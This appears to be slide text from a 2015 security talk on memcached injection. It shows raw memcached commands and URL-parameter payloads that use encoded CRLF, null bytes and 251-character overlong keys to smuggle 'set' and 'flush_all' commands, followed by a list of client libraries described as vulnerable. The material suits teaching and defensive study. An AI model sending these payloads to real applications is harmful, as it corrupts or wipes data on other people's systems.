Memcache Injection (Hacktrick'15)
- 6. > set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END
#! telnet 127.0.0.1 11211
- 10. ?key=omer 0 10 6 rn hacked rn
urlencode(‘r’) = %0d
urlencode(‘n’) = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a
#! phpstorm memcached.php
- 12. ?key=aaaaa…(251)
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251)
flush_all %0d%0a
#! phpstorm memcached.php
- 15. > get key_omer
< VALUE key_omer 0 6
< 123456
< END
#! phpstorm memcached.php
- 17. > get aaa (251)
< ERROR
< get omer
< VALUE omer 0 6
< 353535
< END
#! phpstorm memcached.php
- 18. Python : Python-pylibmc
Php : Memcached
Asp.Net : memcacheddotnetproject (1.1.5)
Java : com.meetup.memcached
#! cat vulnerable_libraries